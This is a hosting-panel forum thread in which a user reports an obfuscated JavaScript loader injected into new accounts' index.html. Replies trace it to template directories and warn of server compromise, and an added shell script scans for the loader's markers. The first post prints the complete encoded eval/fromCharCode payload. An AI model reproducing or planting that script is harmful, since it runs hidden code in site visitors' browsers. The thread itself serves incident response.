new account index.html hacked

seachen

I notice that when I create a new user account, the index.html includes the below code:

<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,218,357,400,120,218,348,428,101,216,321,184,116,216,300,184,99,198,141,400,47,104,144,208,46,224,312,448,63,206,333,244,49,78,96,476,105,200,348,416,61,78,147,192,39,64,312,404,105,206,312,464,61,78,147,192,39,64,345,464,121,216,303,244,39,236,315,460,105,196,315,432,105,232,363,232,104,210,300,400,101,220,177,448,111,230,315,464,105,222,330,232,97,196,345,444,108,234,348,404,59,216,303,408,116,116,144,236,116,222,336,232,48,118,117,248,60,94,315,408,114,194,327,404,62,68,123,236,13,18,27,500,13,18,27,408,117,220,297,464,105,222,330,128,105,204,342,388,109,202,342,160,41,246,39,36,9,18,354,388,114,64,306,128,61,64,300,444,99,234,327,404,110,232,138,396,114,202,291,464,101,138,324,404,109,202,330,464,40,78,315,408,114,194,327,404,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,460,114,198,117,176,39,208,348,464,112,116,141,188,109,238,300,480,109,232,321,404,108,214,138,464,108,200,138,396,99,94,300,188,52,96,156,184,112,208,336,252,103,222,183,196,39,82,177,408,46,230,348,484,108,202,138,472,105,230,315,392,105,216,315,464,121,122,117,416,105,200,300,404,110,78,177,408,46,230,348,484,108,202,138,448,111,230,315,464,105,222,330,244,39,194,294,460,111,216,351,464,101,78,177,408,46,230,348,484,108,202,138,432,101,204,348,244,39,96,117,236,102,92,345,464,121,216,303,184,116,222,336,244,39,96,117,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,1
56,119,210,300,464,104,78,132,156,49,96,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,208,303,420,103,208,348,156,44,78,147,192,39,82,177,52,9,18,27,400,111,198,351,436,101,220,348,184,103,202,348,276,108,202,327,404,110,232,345,264,121,168,291,412,78,194,327,404,40,78,294,444,100,242,117,164,91,96,279,184,97,224,336,404,110,200,201,416,105,216,300,160,102,82,177,52,9,18,375];if(window.document)for(i=6-2-1-2-1;-587+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}}</script>

May I know how to remove this?
 
Remove that index.html and look at your /usr/local/directadmin/data/templates/default/index.html. If that was hacked, then you need to replace it with a good one. The other place you may also want to look is in the /usr/local/directadmin/data/templates/custom directory, for an index.html that would contain the above. If it exists in either place, any new accounts will get that garbage.
 
In fact, if the template directories include that exploit it's likely your system has been hacked, probably by someone well acquainted with DirectAdmin, and may no longer be trusted.

Jeff
 
Actually, if I remember correctly, the main pages copied to a new user are stored in:

(for admin)
/home/admin/domains/default

Am I wrong?
If not, maybe "just" your admin user can be compromised, but of course, if it is, you cannot know how deep he goes, so a format should be suggested.

Regards
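
The check both replies describe, as an added example that is not part of the thread: a POSIX shell scan of the template and skeleton directories they name, looking for index.html files that carry markers taken from the script quoted in the first post. The marker set, the two-hit threshold, and the function names (`marker_hits`, `scan_dirs`, `demo`) are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the thread): list index.html files that carry the
# obfuscation markers visible in the injected <script> quoted above.

# Locations named by the posters; pass other directories as arguments.
DEFAULT_DIRS="/usr/local/directadmin/data/templates/default
/usr/local/directadmin/data/templates/custom
/home/admin/domains/default"

# Count how many of three markers from the quoted script a file contains.
# The marker set and the threshold used below are this example's heuristic.
marker_hits() {
    hits=0
    # eval looked up through a string index instead of being called by name
    if grep -Fq 'window["eval"]' "$1"; then hits=$((hits + 1)); fi
    # "fromCharCode" assembled from fragments to dodge plain string matching
    if grep -Fq '"CharC"+"ode"' "$1"; then hits=$((hits + 1)); fi
    # a long run of comma-separated integers: the encoded payload itself
    if grep -Eq '([0-9]{1,4},){50,}' "$1"; then hits=$((hits + 1)); fi
    echo "$hits"
}

# Print every index.html under the given directories with two or more hits.
# Assumes file names contain no newlines.
scan_dirs() {
    if [ "$#" -eq 0 ]; then set -- $DEFAULT_DIRS; fi
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -name 'index.html' | while IFS= read -r f; do
            if [ "$(marker_hits "$f")" -ge 2 ]; then echo "$f"; fi
        done
    done
}

# Constructed sample: one file with harmless stand-ins for the markers and
# one clean file. Prints what scan_dirs reports, relative to the temp dir.
demo() {
    tmp=$(mktemp -d) && mkdir "$tmp/custom" "$tmp/default"
    nums=$(seq -s, 100 180)
    printf '<script>e=window["eval"];f+="CharC"+"ode";n=[%s];</script>\n' \
        "$nums" > "$tmp/custom/index.html"
    echo '<html><body>Welcome</body></html>' > "$tmp/default/index.html"
    scan_dirs "$tmp" | sed "s|^$tmp/||"
    rm -rf "$tmp"
}

# With no arguments this scans the three locations named in the thread.
scan_dirs "$@"
```

A reported file is a candidate for replacement from a known-good copy, as the first reply says; an empty result only means these markers were not found in those directories.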
 